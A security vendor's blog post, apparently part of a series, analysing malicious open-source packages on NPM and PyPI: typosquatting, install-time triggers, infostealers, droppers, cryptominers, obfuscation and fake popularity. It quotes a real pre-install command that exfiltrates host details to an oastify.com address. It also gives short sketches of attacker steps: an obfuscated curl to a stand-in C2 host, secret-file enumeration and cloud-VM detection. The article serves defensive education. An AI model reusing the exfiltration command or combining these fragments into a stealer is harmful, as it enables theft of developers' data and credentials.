In the previous episode, Open Source Malicious Packages: The Problem, we discussed why threat actors are so enthusiastic about publishing new malicious components or injecting malware into the latest versions of existing ones: the open source infrastructure allows anyone, anywhere, to create an ephemeral account in a component registry (like NPM, PyPI, Docker Hub, or Visual Studio Marketplace) or a collaborative development platform (like GitHub). Zero cost, and many opportunities to leverage the excess trust that software teams traditionally place in third-party components.
This asymmetry, between how easy it is for attackers to distribute malware through the open source infrastructure and how hard it is for organizations developing software (everyone?) to avoid getting infected, and to avoid delivering malware in the software they distribute to others, is why the number of known malicious packages nearly reached the quarter-million mark last year.
This is a problem of such magnitude that no single organization can solve it, and the community is in the process of reframing the open source process around trust, secure-by-default and secure-by-design principles, and the component lifecycle. We will look at these ideas in the next episode, Protecting Against Open Source Malicious Packages: What Does (Not) Work.
Remember that we are talking about software components that most of the time correspond to software packages: reusable components packaged so they can be referenced as a dependency in a software manifest and installed with a package manager or build tool. Note that the same analysis extends to public container images (used by container runtimes and orchestration platforms like Kubernetes) and to extensions for software tools (for building, automation, and deployment).
Here we analyze how this attack tactic based on malicious components works, drawing on past examples and on what we have seen in our Malware Early Warning (MEW) platform. We will dissect malicious components along several dimensions:
(1) the distribution channel chosen (the registry used, whether a new or an existing component, and the technique used to infect the published component version); (2) how the malware is activated or triggered; (3) the malicious behavior, i.e. what harmful actions are observed and what motivates the attacker; (4) which techniques are common for obfuscation, evasion, lateral movement, communication with command and control (C2) hosts, etc.; and (5) the techniques for gaining enough popularity and trust that victims end up installing the component.
The Distribution Mechanism Chosen
We observe a “background noise” of unsophisticated malicious packages that use typosquatting: many popular packages receive a barrage of similarly named packages, each a typo away, in the expectation that they will phish some unwary developer who mistypes a dependency name.
They use an ephemeral account, publish a group of typosquat packages, create another account, publish another group… With some automation and ingenuity they can gain some sophistication, but typically they are rather trivial. We internally call them “anchovies”. Credential stealing is the main goal, but occasionally we find spyware exfiltrating source code or sensitive data like personally identifiable information (PII), clipboard captures, and other misdeeds.
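Defenders can flag many of these “anchovies” mechanically, since a typosquat name sits at a small edit distance from a popular one. A minimal sketch of the idea, using only the Python standard library (the popular-package list is an illustrative stub, and the similarity threshold is a guess, not a tuned value):

```python
import difflib

# Illustrative stub: in practice this would be the top few thousand
# packages by download count in the target registry.
POPULAR = ["requests", "numpy", "lodash", "express"]

def typosquat_candidates(name, threshold=0.85):
    """Return popular packages whose names are suspiciously close to `name`."""
    return [
        popular for popular in POPULAR
        if name != popular
        and difflib.SequenceMatcher(None, name, popular).ratio() >= threshold
    ]

print(typosquat_candidates("reqeusts"))  # → ['requests']
```

Real registries use more elaborate checks (keyboard-adjacency models, homoglyphs, scope confusion), but the core signal is exactly this kind of name proximity.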
Out of the blue we also see more sophisticated malicious components, the “sharks”. A minority are targeted at specific groups or organizations, typically with crypto drainers or web skimmers that are activated conditionally, perhaps following the approach seen in the event-stream incident of decrypting the attack payload only when the package is referenced from a target package.
The distribution mechanism was analyzed in the excellent and now classic paper, “Backstabber’s Knife Collection: A Review of Open Source Software Supply Chain Attacks”, which is a must-read. Surely you have seen this nice chart before:
All avenues were explored, including new and existing packages; affecting the source code, the build system, or the packaged component itself; using stolen credentials or social engineering; hijacking abandoned accounts and repositories or poisoning maintained ones. Some attacks received names (Typosquatting, Dependency Confusion, Manifest Confusion, Repo-jacking, etc.) and have been discussed elsewhere.
What about the registries chosen?
NPM continues to lead in the total number of malicious packages, but we saw a spike on PyPI starting this year; Python is a popular ecosystem for data science and machine learning. In fact, malware density is now higher on PyPI than on NPM.
How the malware is triggered
Malicious packages are triggered during installation in only 4 out of 10 cases (in recent years it was closer to 6 out of 10). The rest run their malicious behavior at runtime, with 1 out of 100 triggered while running tests. Adversaries seem to know that uncontrolled execution of installation scripts is now disabled in many environments.
What are the bad guys getting?
We list the malicious behavior categories below, most popular first. Note that impact varies widely: a wiper is stubbornly destructive, but it is uncommon and was seen only in a few cases, related to targeted cyberwar campaigns or brutal hacktivism. The following categories are pretty common:
- InfoStealer / Credentials Drainer. By far the most frequent: over 90% of the unsophisticated attacks are simple stealers, mainly looking for credentials like passwords, access tokens, API keys, and private keys (for SSH and the like). It is probably the simplest kind of malware to write (along with wipers?). They enumerate known files/directories and other sources (e.g. registry keys), package the contents, and send the data to a C2 server. The idea is simple: “I publish a stealer to phish credentials, so I can later use those credentials to launch a directed attack”.
The C2 networking observed is typically cheap-and-dirty, like Telegram channels or ngrok-like tunneling tools (often in the form of reverse proxies exposed through VPN egress IPs). There are hundreds (!) of possibilities, with many GitHub projects under the password-stealer topic. Specializations like keyloggers are rare for malicious packages and container images, but more frequent in tool extensions, where user interaction is expected.
- Dropper / Downloader. Second in popularity, and typically the first stage in multi-stage attacks. More than one in three malicious components contain droppers (the malicious payload ships inside the package) or downloaders (the payload is fetched from an endpoint under the attacker's control). The payload is often a known binary malware variant, which is run and sometimes persisted, installing backdoors, spyware, crypto drainers, and more. The downloaded or deployed payload starts a second-phase attack with all the power of existing binary malware. The binaries can be distributed within the package, often masqueraded as images or other supposedly innocuous file types, avoiding the detection that a connection to an unexpected site would trigger.
- Cryptocurrency Stealers / Miners. Financially motivated adversaries are happy to use your cloud assets to run cryptominers (they even check whether they are running in a cloud VM). They do not care about the poor profit ratio: roughly $1 earned for every $53 billed to the victim for the stolen cloud infrastructure. Victims may not notice until they receive an unexpected bill. Fortunately, this comes and goes: cryptojacking campaigns in malicious packages occasionally pop up and then fade away, phishing wallet users or sometimes targeting the wallet provider itself, as in the Ledger attack.
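Checking for a cloud environment requires nothing exotic. As an illustration of the idea (our own sketch, not code from a real sample), a miner on Linux could simply inspect the DMI system-vendor string; probing the cloud instance-metadata endpoint is another common variant:

```python
import pathlib

# Vendor strings that betray common cloud hypervisors (illustrative list).
CLOUD_VENDORS = ("amazon", "google", "microsoft", "qemu", "vmware", "xen")

def looks_like_cloud_vm(dmi_path="/sys/class/dmi/id/sys_vendor"):
    """Heuristic a cryptominer might use: check the DMI system vendor on Linux."""
    try:
        vendor = pathlib.Path(dmi_path).read_text().strip().lower()
    except OSError:
        return False  # file missing or unreadable: assume bare metal
    return any(v in vendor for v in CLOUD_VENDORS)
```

The same check, inverted, is used by evasive malware to stay dormant inside analysis sandboxes.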
Other behaviors, like deploying a backdoor for remote code execution by opening a reverse shell, are less frequent now than in the past. For example, the 123rf_contributor_web package (now removed from the registry) opened, without any obfuscation, a reverse shell copied and pasted from the Reverse Shell Cheat Sheet:
In addition to legitimate and malicious components, we have observed several abuses, including:
Spam packages
There are thousands of small packages, mostly on NPM, with no malware but promising easy earnings, snake oil, links to Viagra offerings, and the like. A handful of users publish such spam and consume a lot of the registry's bandwidth. Another actor (or actors), possibly from Indonesia, tried to profit by abusing teaRank, a mechanism intended for compensating open-source developers, by creating tens of thousands of interrelated NPM packages with matching GitHub dummy repositories. This is a clear violation of the terms of use.
Bug bounty and security research hoaxes
Some packages describe themselves as exfiltrating data for good purposes, like detecting security flaws for bug bounty programs or researching certain aspects of the ecosystem. We have seen thousands of packages in this category, which send identifying (but not particularly sensitive) data to a Burp Collaborator address from PortSwigger (e.g. a host in the oastify.com domain). We often observe copycats of the Dependency Confusion proof of concept by Alex Birsan, like the aurora-webmail-pro package (removed from the registry), which simply ran this nasty code in its pre-install script:
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done")
It also included a “This is Simple Dependency Confusion Attack Proof of Concept” disclaimer in the package.json description. This is a clear violation of the terms of service, even without malicious intent.
Some good news? We have not (yet) seen ransomware attacks delivered through malicious components. For unknown reasons, cybercriminals seem to prefer the more traditional email phishing, RDP-based, and drive-by download delivery mechanisms.
Additional Techniques Observed
Many techniques were used for persistence, defense evasion, information collection, communication with command & control hosts, and exfiltration.
Persistence in malicious components is usually gained through the persistence features of a second-stage binary malware, but sometimes the behavior lives in the package code itself, with scheduled tasks and Windows registry changes being the most common.
Obfuscation is common, but unsophisticated. Most typosquatting packages (remember the “anchovies”?) do not use obfuscation at all; many use trivial techniques (base64/hex encoding or substitution ciphers like rot13) or off-the-shelf code obfuscators and minification, which are easily reversed with the right tooling. Only the “sharks” use real, hard-core obfuscation that is hard to reverse-engineer.
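To illustrate how trivial these layers are, here is a stand-in payload of our own (not taken from a real sample, and the C2 URL is fictitious) wrapped in rot13 plus base64, then unwound with two standard-library calls:

```python
import base64
import codecs

# Our own example payload wrapped in two trivial layers: rot13, then base64.
# The URL is fictitious; nothing here contacts the network.
obfuscated = base64.b64encode(
    codecs.encode("curl http://c2.example/x", "rot13").encode()
)

# De-obfuscation is just the inverse pipeline:
plaintext = codecs.decode(base64.b64decode(obfuscated).decode(), "rot13")
print(plaintext)  # → curl http://c2.example/x
```

Automated scanners routinely apply exactly these inverse transforms before pattern-matching, which is why such layers buy the attacker very little.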
Obfuscation may hide the attack, but why would code in an open-source component need to be obfuscated at all? Is that not evidence that something is being hidden from plain sight? Not quite: we have found many instances of non-malicious packages that use obfuscation to protect intellectual property, contradictory as that is with “open source”. So obfuscation can serve as evidence of malware, but it is not conclusive. It is also difficult to de-obfuscate.
Evasion of defense controls relies on simple techniques. Malicious code is often wrapped in try … catch blocks that silently ignore exceptions, so abnormal activity does not show up in the logs. Verification of the environment (running in a VM or container) is rare, except in malware targeting a particular organization or environment.
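The pattern is as mundane as wrapping the whole payload in a catch-all handler, so failures never surface in logs. An illustrative sketch (the payload here is a harmless stand-in):

```python
def payload():
    # Stand-in for malicious activity that may fail noisily,
    # e.g. a blocked network call to a C2 host raising an exception.
    raise ConnectionError("C2 unreachable")

try:
    payload()
except Exception:
    pass  # swallow everything: no traceback, no log entry, no trace
```

To a casual observer the package appears to install and run cleanly, even when every malicious action was blocked.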
Masquerading binaries as images and PDF files (a crude form of steganography) is another technique we have seen used to evade detection.
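Spotting this kind of masquerading is straightforward when a file's leading bytes are compared against what its extension promises. A minimal sketch with a few illustrative signatures:

```python
import os

# Magic-byte signatures for a few common formats (illustrative subset).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF",
    ".gif": b"GIF8",
}

def extension_matches_content(path):
    """Return False when a file's header contradicts its extension."""
    ext = os.path.splitext(path)[1].lower()
    expected = MAGIC.get(ext)
    if expected is None:
        return True  # no signature known for this extension
    with open(path, "rb") as f:
        return f.read(len(expected)) == expected
```

A Windows executable renamed to payload.png starts with `MZ`, not the PNG header, and fails this check immediately.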
As the most common malicious components are infostealers, data collection is essential. Secrets (passwords, access tokens, API keys, cryptographic keys) are routinely scraped from log files, environment variables, and even the clipboard (seen with banking trojans and crypto stealers). Source code exfiltration is also common, as package installation often happens on a development machine where internal git repositories may be cloned; we have seen packages enumerating directories in search of git repositories. Looking for locations like .env, private.pem, settings.py, app.js, or application.properties is quite common.
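The collection step is usually nothing more than a directory walk over well-known filenames. A harmless sketch of the enumeration logic (an illustrative subset of names, and no exfiltration):

```python
import os

# Filenames infostealers commonly hunt for (illustrative subset).
SECRET_NAMES = {".env", "private.pem", "settings.py",
                "application.properties", "id_rsa"}

def find_secret_files(root):
    """Walk a directory tree and list files matching well-known secret names."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name in SECRET_NAMES:
                hits.append(os.path.join(dirpath, name))
    return hits
```

In a real stealer the step after this walk is the only malicious one: packaging the file contents and shipping them to a C2 endpoint.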
Exfiltration is another widely deployed action. Only a minority of malicious packages even try to hide the destination of the extracted data. Telegram channels and ngrok-like tunnels are often used, along with many domains that are typically allow-listed.
Other techniques, like privilege escalation or lateral movement, were less common.
Gaining Popularity and Trust
Imagine a tech crook with a ready-made killer malicious thing wondering: “How do I make this piece of s#$! trustworthy to those unsuspecting morons?”.
That translates into making the malicious component's entry show many stars/forks (for popularity), plus versions, issues, and pull requests (for activity). The idea is to gain fictitious popularity (stars) and dependents, and a convincing look in terms of relevance and maintenance.
The registry does not check if the contents in a GitHub project and the package contents match. This is a well-known issue in the software supply chain. The public registries are giant sinkholes that swallow everything thrown at them. You can link any repository.
If the malicious package typosquats a popular one, that's easy: just reference the existing GitHub repository in the manifest used to create the package and publish it to the registry. For new packages on a fake GitHub repo, more ingenuity may be needed, perhaps creating fake stargazing/forking GitHub accounts via scripting.
And if the contents of your package are reasonably similar to the repo, slip a couple of well-designed changes here and there… You can inject your malware into a new package resembling a popular one, reference the existing one's repository, and wait for the typos. If anyone dares to compare the contents of the package tarball with the contents of the GitHub repository, the differences at the malware injection points can easily be missed. We have seen this approach many times.
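Catching the injection mechanically amounts to hashing both file trees and diffing them. A simplified sketch in Python (a real check would first unpack the tarball, normalize paths, and tolerate build-generated files; all names here are illustrative):

```python
import hashlib
import os

def tree_digests(root):
    """Map relative file paths to SHA-256 digests of their contents."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as f:
                digests[rel] = hashlib.sha256(f.read()).hexdigest()
    return digests

def diff_package_vs_repo(package_dir, repo_dir):
    """Files added to, or modified in, the published package vs the repo."""
    pkg, repo = tree_digests(package_dir), tree_digests(repo_dir)
    added = sorted(set(pkg) - set(repo))
    modified = sorted(p for p in pkg if p in repo and pkg[p] != repo[p])
    return added, modified
```

A typosquat that ships one extra install script, or one subtly modified source file, shows up immediately in `added` or `modified`; the hard part in practice is deciding which differences are legitimate build artifacts.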
A mechanism for a component to make a tamper-proof statement about provenance, how the package was built, from what sources, and by whom, would be welcome. But that is another story.
Is component X malware?
Is there a (comprehensive) database of malicious packages? Nope. Open-source vulnerabilities get a CVE ID assigned, but only a few malicious packages (particularly the ones that make headlines) are given one. The CWE for malicious packages is CWE-506 (Embedded Malicious Code).
The usual malware tools (VirusTotal, MalwareBazaar, SOREL-20M…) do not make specific provisions for malicious components. That would be welcome!
There are research sample databases and datasets for analysis (we use a few of them), but entries are added only once the malicious package is known, which is often too late. If you are interested, the OpenSSF Malicious Packages repository is a nice start.
In the next post, we will discuss how to know if a given package is malicious. Spoiler: yes, there are ways of checking for malicious components early during the exposure window, before the registry removes a known malicious component.
Further reading
In the next episode, “Protecting Against Open Source Malicious Packages: What Does (Not) Work”, we will discuss the do's and don'ts of open-source security. Most security-aware professionals have intuitions about how to handle this threat, but misconceptions abound.
We will review why these misconceptions are wrong, and how they contribute to the popularity of this attack mechanism and to the overwhelming risk that organizations are experiencing. We will then proceed with what does work, and what effort and resources are involved.
Also, we are going to post about the evolution of malicious packages in terms of their intent, injection mechanism, and attack techniques.
Stay tuned!